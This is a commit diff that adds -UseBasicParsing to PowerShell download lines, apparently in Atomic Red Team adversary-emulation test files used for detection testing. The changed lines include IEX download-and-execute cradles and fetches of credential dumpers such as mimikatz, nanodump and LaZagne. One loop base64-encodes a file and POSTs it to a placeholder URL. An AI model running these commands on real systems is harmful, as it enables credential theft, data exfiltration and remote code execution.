add -UseBasicParsing
This commit is contained in:
Hare Sudhan
@@ -30,7 +30,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" -UseBasicParsing
|
||||
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
|
||||
New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
|
||||
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
|
||||
@@ -81,7 +81,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null
|
||||
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}"
|
||||
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
"#{dumpert_exe}"
|
||||
@@ -109,7 +109,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
|
||||
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
|
||||
@@ -164,7 +164,7 @@ atomic_tests:
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
|
||||
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
|
||||
$zipUrl = (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
|
||||
$basePath = Split-Path "#{mimikatz_exe}" | Split-Path
|
||||
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
|
||||
- description: |
|
||||
@@ -274,7 +274,7 @@ atomic_tests:
|
||||
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" -UseBasicParsing
|
||||
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip" "PathToAtomicsFolder\..\ExternalPayloads\Procdump" -Force
|
||||
New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
|
||||
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
|
||||
@@ -355,7 +355,7 @@ atomic_tests:
|
||||
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
|
||||
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
#{xordump_exe} -out #{output_file} -x 0x41
|
||||
@@ -422,7 +422,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
|
||||
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
|
||||
|
||||
@@ -60,6 +60,6 @@ atomic_tests:
|
||||
|
||||
while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
|
||||
$encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
|
||||
Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
|
||||
Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk -UseBasicParsing
|
||||
}
|
||||
$file.Close()
|
||||
|
||||
@@ -30,7 +30,7 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
|
||||
Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip"
|
||||
Invoke-WebRequest #{url} -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -UseBasicParsing
|
||||
executor:
|
||||
command: |-
|
||||
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
|
||||
|
||||
@@ -148,7 +148,7 @@ Invoke-DownloadCradle -Type Powershell -Command $Command
|
||||
|
||||
"Powershell Invoke-WebRequest"
|
||||
If ($PSVersionTable.PSVersion.Major -gt 2){
|
||||
$Command = "(`'" + $Url[0] + "`'|ForEach-Object{(IWR (Item Variable:\_).Value)}) | IEX"
|
||||
$Command = "(`'" + $Url[0] + "`'|ForEach-Object{(IWR (Item Variable:\_).Value -UseBasicParsing)}) | IEX"
|
||||
Invoke-DownloadCradle -Type Powershell -Command $Command
|
||||
}
|
||||
Else{"`tMethod supported on Powershell 3.0 and above only`n"}
|
||||
|
||||
@@ -25,7 +25,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
Write-Host Downloading radmin installer
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}"
|
||||
Invoke-WebRequest "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}" -UseBasicParsing
|
||||
Write-Host Install Radmin
|
||||
Start-Process msiexec -Wait -ArgumentList /i , "PathToAtomicsFolder\..\ExternalPayloads\#{radmin_installer}", /qn
|
||||
executor:
|
||||
@@ -58,7 +58,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
Write-Host Downloading PDQ Deploy installer
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}"
|
||||
Invoke-WebRequest "https://download.pdq.com/release/19/Deploy_19.3.350.0.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -UseBasicParsing
|
||||
Write-Host Install PDQ Deploy
|
||||
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\#{PDQ_Deploy_installer}" -Wait -ArgumentList "/s"
|
||||
executor:
|
||||
@@ -81,7 +81,7 @@ atomic_tests:
|
||||
if (Test-Path "${env:ProgramFiles(x86)}\Chocolatey\choco.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Write-Host Downloading Chocolatey installer
|
||||
Invoke-WebRequest -Uri "https://chocolatey.org/install.ps1" -OutFile "chocolatey-install.ps1"
|
||||
Invoke-WebRequest -Uri "https://chocolatey.org/install.ps1" -OutFile "chocolatey-install.ps1" -UseBasicParsing
|
||||
Write-Host Installing Chocolatey
|
||||
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -File chocolatey-install.ps1" -Wait
|
||||
executor:
|
||||
|
||||
@@ -214,7 +214,7 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0 } else { exit 1 }
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
|
||||
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" -UseBasicParsing
|
||||
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
|
||||
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
|
||||
executor:
|
||||
|
||||
@@ -60,7 +60,7 @@ atomic_tests:
|
||||
if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}"
|
||||
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
Invoke-Expression "#{adrecon_path}"
|
||||
@@ -87,7 +87,7 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
|
||||
@@ -112,7 +112,7 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
|
||||
@@ -137,7 +137,7 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
|
||||
@@ -162,7 +162,7 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
||||
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
|
||||
|
||||
@@ -28,14 +28,14 @@ atomic_tests:
|
||||
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe"
|
||||
Invoke-WebRequest "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\psiphon3.exe" -UseBasicParsing
|
||||
- description: |
|
||||
Batch file containing commands to run must be in src directory
|
||||
prereq_command: |
|
||||
if (Test-Path "PathToAtomicsFolder\T1090.003\src\Psiphon.bat") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1090.003\src\" -ErrorAction ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" -UseBasicParsing
|
||||
executor:
|
||||
name: powershell
|
||||
command: |
|
||||
@@ -65,7 +65,7 @@ atomic_tests:
|
||||
if (Test-Path "#{TorExe}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip"
|
||||
Invoke-WebRequest "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -UseBasicParsing
|
||||
expand-archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\tor.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\tor"
|
||||
executor:
|
||||
command: |
|
||||
|
||||
@@ -30,7 +30,7 @@ atomic_tests:
|
||||
if (Test-Path "#{filename}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
copy "#{filename}" %TEMP%\hello.js
|
||||
@@ -69,7 +69,7 @@ atomic_tests:
|
||||
if (Test-Path "#{filename}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
copy "#{filename}" %TEMP%\LibHello.js
|
||||
|
||||
@@ -32,7 +32,7 @@ atomic_tests:
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
|
||||
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
|
||||
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
|
||||
$zipUrl = (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
|
||||
$mimikatz_exe = cmd /c echo #{mimikatz_path}
|
||||
$basePath = Split-Path $mimikatz_exe | Split-Path
|
||||
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
|
||||
|
||||
@@ -24,7 +24,7 @@ atomic_tests:
|
||||
if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "#{helper_file}") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
netsh.exe add helper "#{helper_file}"
|
||||
|
||||
@@ -30,16 +30,16 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
New-Item -Type Directory (split-path "#{registry_file}") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}"
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}" -UseBasicParsing
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}" -UseBasicParsing
|
||||
- description: |
|
||||
DLL's must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll)
|
||||
prereq_command: |
|
||||
if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll -UseBasicParsing
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
reg.exe import "#{registry_file}"
|
||||
|
||||
@@ -25,7 +25,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
|
||||
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" -UseBasicParsing
|
||||
Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
|
||||
Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force
|
||||
executor:
|
||||
@@ -72,7 +72,7 @@ atomic_tests:
|
||||
if (Test-Path "#{lazagne_path}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory (split-path "#{lazagne_path}") -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "#{lazagne_path}"
|
||||
Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/v2.4.5/LaZagne.exe" -OutFile "#{lazagne_path}" -UseBasicParsing
|
||||
executor:
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
@@ -92,7 +92,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
|
||||
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
|
||||
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi -UseBasicParsing
|
||||
msiexec /i $installer /qn
|
||||
Start-Process -FilePath "chrome.exe"
|
||||
Stop-Process -Name "chrome"
|
||||
@@ -118,7 +118,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
$installer = "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe"
|
||||
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe
|
||||
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\OperaStandaloneInstaller.exe" https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe -UseBasicParsing
|
||||
Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0'
|
||||
Start-Sleep -s 180
|
||||
Stop-Process -Name "opera"
|
||||
@@ -232,7 +232,7 @@ atomic_tests:
|
||||
if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -erroraction silentlycontinue) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi"
|
||||
Invoke-WebRequest "https://ftp.mozilla.org/pub/firefox/releases/98.0/win64/en-US/Firefox%20Setup%2098.0.msi" -outfile "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" -UseBasicParsing
|
||||
msiexec.exe /i "PathToAtomicsFolder\..\ExternalPayloads\firefox.msi" /quiet
|
||||
sleep -s 30
|
||||
start-process "$env:programfiles\Mozilla Firefox\firefox.exe".
|
||||
@@ -266,7 +266,7 @@ atomic_tests:
|
||||
if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
|
||||
Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
|
||||
Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" -UseBasicParsing
|
||||
- description: |
|
||||
Pycryptodome library must be installed
|
||||
prereq_command: |
|
||||
@@ -408,7 +408,7 @@ atomic_tests:
|
||||
if (Test-Path "#{webbrowserpassview_path}") {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1555.003\bin\" -ErrorAction ignore -Force | Out-Null
|
||||
Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}"
|
||||
Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile "#{webbrowserpassview_path}" -UseBasicParsing
|
||||
executor:
|
||||
command: |
|
||||
Start-Process "#{webbrowserpassview_path}"
|
||||
@@ -432,7 +432,7 @@ atomic_tests:
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
||||
$installer = "PathToAtomicsFolder\..\ExternalPayloads\FirefoxStubInstaller.exe"
|
||||
Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US"
|
||||
Invoke-WebRequest -OutFile $installer "https://download.mozilla.org/?product=firefox-stub&os=win&lang=en-US" -UseBasicParsing
|
||||
